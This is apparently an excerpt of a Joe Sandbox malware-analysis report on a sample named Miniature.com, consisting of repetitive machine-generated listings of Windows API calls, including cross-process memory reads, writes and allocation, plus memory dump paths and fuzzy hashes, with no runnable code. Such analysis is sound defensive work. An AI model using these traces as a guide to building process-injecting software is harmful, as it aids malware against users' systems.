                                                                                                                                                                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DAD2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DAE4
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DAF6
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DB08
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4DB1A
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C4262E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4), ref: 00C42D4E
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C42D38: GetLastError.KERNEL32(00CE1DC4,?,00C4DB51,00CE1DC4,00000000,00CE1DC4,00000000,?,00C4DB78,00CE1DC4,00000007,00CE1DC4,?,00C4DF75,00CE1DC4,00CE1DC4), ref: 00C42D60
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42640
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42653
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42664
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C42675
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0587fa9176bd19674baae1e42ee9473483ce14ac66d08dc2e94ec3026378dcbf
                                                                                                                                                                                                                                                                                            • Instruction ID: a8c1cbd469c1a2449ad3aee6c862d993d82daa5676d81eada681cdd5b2cdf0e1
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0587fa9176bd19674baae1e42ee9473483ce14ac66d08dc2e94ec3026378dcbf
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 39F0DAB0C421A19B8A12AF94FC83B4C3B68BB24771385091BF9159E2B5C7314911FFC4
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: __freea$_free
                                                                                                                                                                                                                                                                                            • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                            • API String ID: 3432400110-3206640213
                                                                                                                                                                                                                                                                                            • Opcode ID: c2c5ac95bbf5b521050922de1985cd25ad0cf05f7625a4f77539babd8e6aa110
                                                                                                                                                                                                                                                                                            • Instruction ID: a3855bdb6353fff3b5d78af18da32ada2fd07140e013810517f88b9c8f1da144
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2c5ac95bbf5b521050922de1985cd25ad0cf05f7625a4f77539babd8e6aa110
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 85D10275A10206DACB249F68C8557FABBB1FF55300F2D415AEDA29B250D3359EC0CBA0
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BDCA: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C72B1D,?,?,00000034,00000800,?,00000034), ref: 00C7BDF4
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00C730AD
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BD95: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00C72B4C,?,?,00000800,?,00001073,00000000,?,?), ref: 00C7BDBF
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCF1: GetWindowThreadProcessId.USER32(?,?), ref: 00C7BD1C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCF1: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00C72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C7BD2C
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7BCF1: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00C72AE1,00000034,?,?,00001004,00000000,00000000), ref: 00C7BD42
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C7311A
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00C73167
                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                                                                                                                                                                            • String ID: @
                                                                                                                                                                                                                                                                                            • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                                                                            • Opcode ID: 7e08b7266f981e0846aaf51a9ab41ba86465fefb5b328dd2dbf68329a6a66d08
                                                                                                                                                                                                                                                                                            • Instruction ID: ff397b06e8bd88456c59b44006dc12c609e97120dbeff9a25b99d2b0e3468df7
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e08b7266f981e0846aaf51a9ab41ba86465fefb5b328dd2dbf68329a6a66d08
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1C411972900218AFDB11DBA4CD81BDEBBB8EF49704F008095FA59B7185DA706F85DB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com,00000104), ref: 00C41AD9
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C41BA4
                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 00C41BAE
                                                                                                                                                                                                                                                                                            Strings
Memory Dump Source
• Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
• Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                                            • String ID: C:\Users\user~1\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                            • API String ID: 2506810119-2331755113
                                                                                                                                                                                                                                                                                            • Opcode ID: 00d3d0a31e94d3e2f5e155e871c79ad2be80c1c847f6e13b7db4ab79b5321446
                                                                                                                                                                                                                                                                                            • Instruction ID: 0e9eaf74d9f5364c26e7855e4b3372bb6444f374ae82ae7b7592549c01b38605
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 00d3d0a31e94d3e2f5e155e871c79ad2be80c1c847f6e13b7db4ab79b5321446
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B73183B1E00258ABDB21DF99CC85E9EBBFCFB84710B1841A6F95497211E6704F80D790
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00C7CBB1
                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000007,00000000), ref: 00C7CBF7
                                                                                                                                                                                                                                                                                            • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00CE29C0,01946320), ref: 00C7CC40
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                                                                            • String ID: 0
                                                                                                                                                                                                                                                                                            • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                                                                            • Opcode ID: e5c0e2ba8109fa2493389e17776767f6bd973a013df9bb3721868958728a401f
                                                                                                                                                                                                                                                                                            • Instruction ID: 0b6a598e9fee4770e9655b2fea6a676754badfbe243627b4c672c71b7a6e10ff
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e5c0e2ba8109fa2493389e17776767f6bd973a013df9bb3721868958728a401f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9041B0712043029FD725DF24D8C5B5ABBE8EF85714F148A1DF4AA97291DB30EA04CB62
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00CADCD0,00000000,?,?,?,?), ref: 00CA4F48
                                                                                                                                                                                                                                                                                            • GetWindowLongW.USER32 ref: 00CA4F65
                                                                                                                                                                                                                                                                                            • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00CA4F75
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Window$Long
                                                                                                                                                                                                                                                                                            • String ID: SysTreeView32
                                                                                                                                                                                                                                                                                            • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                                                                            • Opcode ID: fa3d184209808b2ec3ae3fa110069af94bb14c21f5a511efede480c5d88f37df
                                                                                                                                                                                                                                                                                            • Instruction ID: b54a020075ec0a38dab9805eea87f1668855d15198d813e5b2f7afaf383648ff
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fa3d184209808b2ec3ae3fa110069af94bb14c21f5a511efede480c5d88f37df
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CA31B031200206AFDB248F78DC45BEA77A9EB4A338F204725F976A31E0C7B0AD509B50
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C93DB8: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00C93AD4,?,?), ref: 00C93DD5
                                                                                                                                                                                                                                                                                            • inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00C93AD7
                                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C93AF8
                                                                                                                                                                                                                                                                                            • htons.WSOCK32(00000000,?,?,00000000), ref: 00C93B63
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                                                                                                                                                                                                                                                            • String ID: 255.255.255.255
                                                                                                                                                                                                                                                                                            • API String ID: 946324512-2422070025
                                                                                                                                                                                                                                                                                            • Opcode ID: 202c9bbbd0d9301895ec2e0375073cac812cb541d5de4797b847cd3d8cd0d98e
                                                                                                                                                                                                                                                                                            • Instruction ID: 5c6fb57146be1e61ecfa144a177c58eef4752bcf3ca95fabfa03c39d25093879
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 202c9bbbd0d9301895ec2e0375073cac812cb541d5de4797b847cd3d8cd0d98e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9A31A1356002819FCF10DF69C58AEAA77E1EF15328F248159E8268B792D735EF45CB60
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00CA49DC
                                                                                                                                                                                                                                                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00CA49F0
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00CA4A14
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window
                                                                                                                                                                                                                                                                                            • String ID: SysMonthCal32
                                                                                                                                                                                                                                                                                            • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                                                                            • Opcode ID: a7c17a8117e3a187a2886137d6e1e9815e6a824e324241dcfc41c290b46c342f
                                                                                                                                                                                                                                                                                            • Instruction ID: 0a025b7fc330d7a4eb4d76bc7cb327d63643ea9aa4af48c99ddb4a63c02355d8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a7c17a8117e3a187a2886137d6e1e9815e6a824e324241dcfc41c290b46c342f
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2721D132600219BBDF158F60CC86FEF3B79EF89718F110214FA156B1D0D6B1AC559B90
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00CA51A3
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00CA51B1
                                                                                                                                                                                                                                                                                            • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00CA51B8
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                                                                            • String ID: msctls_updown32
                                                                                                                                                                                                                                                                                            • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00CA42DC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00CA42EC
                                                                                                                                                                                                                                                                                            • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00CA4312
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                                                                            • String ID: Listbox
                                                                                                                                                                                                                                                                                            • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 00C8544D
                                                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00C854A1
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000000,?,?,00CADCD0), ref: 00C85515
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                                                                            • String ID: %lu
                                                                                                                                                                                                                                                                                            • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00CA4CED
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00CA4D02
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00CA4D0F
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123356519.0000000000C10000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CAD000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123492549.0000000000CD3000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123620513.0000000000CDD000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            • Associated: 00000010.00000002.2123648981.0000000000CE5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_16_2_c10000_Miniature.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                                                            • String ID: msctls_trackbar32
                                                                                                                                                                                                                                                                                            • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C18577: _wcslen.LIBCMT ref: 00C1858A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00C73712
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C73723
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: GetCurrentThreadId.KERNEL32 ref: 00C7372A
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C736F4: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00C73731
                                                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00C738C4
                                                                                                                                                                                                                                                                                              • Part of subcall function 00C7373B: GetParent.USER32(00000000), ref: 00C73746
                                                                                                                                                                                                                                                                                            • GetClassNameW.USER32(?,?,00000100), ref: 00C7390F
                                                                                                                                                                                                                                                                                            • EnumChildWindows.USER32(?,00C73987), ref: 00C73937
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000010.00000002.2123384148.0000000000C11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00C10000, based on PE: true
